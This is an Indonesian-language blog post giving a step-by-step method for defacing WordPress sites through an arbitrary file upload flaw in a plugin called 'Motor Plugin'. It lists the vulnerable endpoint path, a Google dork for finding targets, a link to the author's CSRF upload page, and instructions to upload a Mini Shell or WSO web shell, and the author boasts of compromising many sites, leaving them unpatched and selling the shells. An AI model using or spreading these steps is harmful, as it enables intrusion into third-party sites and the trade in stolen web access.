stats counter free Deface Metode Arbitrary File Upload "Motor Plugin" - Blogpongo
Endang Saya adalah lulusan SMK yang punya hobi dengan dunia Jurnalistik, Teknologi, Travel dan saya tulis semuanya di blog ini.

Deface Metode Arbitrary File Upload “Motor Plugin”

1 min read

deface motor plugins uploadify

Halo semuanya selamat datang di blogpongo.com udah lama ngak bikin postingan dan pada kesempatan kali ini karena sedang boring dan gak ada kerjaan alias #dirumahaja.

Yups beberapa hari lalu menemukan exploit pada sebuah plugins wordpress yang bernama “Motor Plugin” , plugins ini biasa digunakan untuk website dealer mobil / motor.

Saya pun iseng mendownload plugins tersebut dan ada bug / vuln Arbitrary File Upload yang bisa di eksploitasi dengan csrf, untuk metodenya silakan simak di bawah ini sobat haicker.

Detail Bug Arbitrary File Upload “Uploadify.php” Motor Plugin

Title : Arbitrary File Upload “Uploadify.php” Motor Plugin
Date : 22/03/2020
By : EsevenB
Exploit : site.com/wp-content/plugins/motor_plugin/includes/js/libs/uploadify5/upload_2.php
Vendor : Motor Plugins

Dork Arbitrary File Upload “Uploadify.php” Motor Plugin

Untuk dorknya sederhana saja seperti dork plugins wordpres pada umunya.

DORK : inurl:wp-content/plugins/motor_plugin

Poc Deface Metode Arbitrary File Upload “Motor Plugin”

  • Dorking inurl:wp-content/plugins/motor_plugin
  • Masukan exploit : site.com/wp-content/plugins/motor_plugin/includes/js/libs/uploadify5/upload_2.php
  • Kalo blank VULN
  • Nah Kalo dah nemu yang vuln, lanjut kalian ke csrf, kalian bisa gunakan csrf saya di : https://blogpongo.com/csrf.php
  • Dan isikan untuk postfilenya “FilesArray
  • Tinggal upload shell kalian, tapi saya sarankan gunakan Mini Shell / WSO shell saja.

Akses file Deface Metode Arbitrary File Upload “Motor Plugin”

site.com/_filename_random.php

Nanti juga bakal keliatan nama filenya seperti gambar di atas “_mini_1585324433.php

Kesimpulan

Metode deface ini sangat mudah dan sederhana untuk di lakukan di rumah hehe, terlebih metode ini masih sangat fresh alias 0Day, karena saya juga mencari apakah sudah ada yang menemukan exploit ini apa belum dan ternyata belum ada.

Seperti yang telihat di gambar, saya sudah mendapatkan banyak sekali website vuln, namun tenang saja semua website tidak saya tutup bugnya, saya hanya sekedar upload shell dan jual saja untuk kebutuhan hheh.

0 Shares
Endang Saya adalah lulusan SMK yang punya hobi dengan dunia Jurnalistik, Teknologi, Travel dan saya tulis semuanya di blog ini.
Panduan seputar Blogging, Adsense, SEO, Template Dan Tips & Trik Blog KangBlogger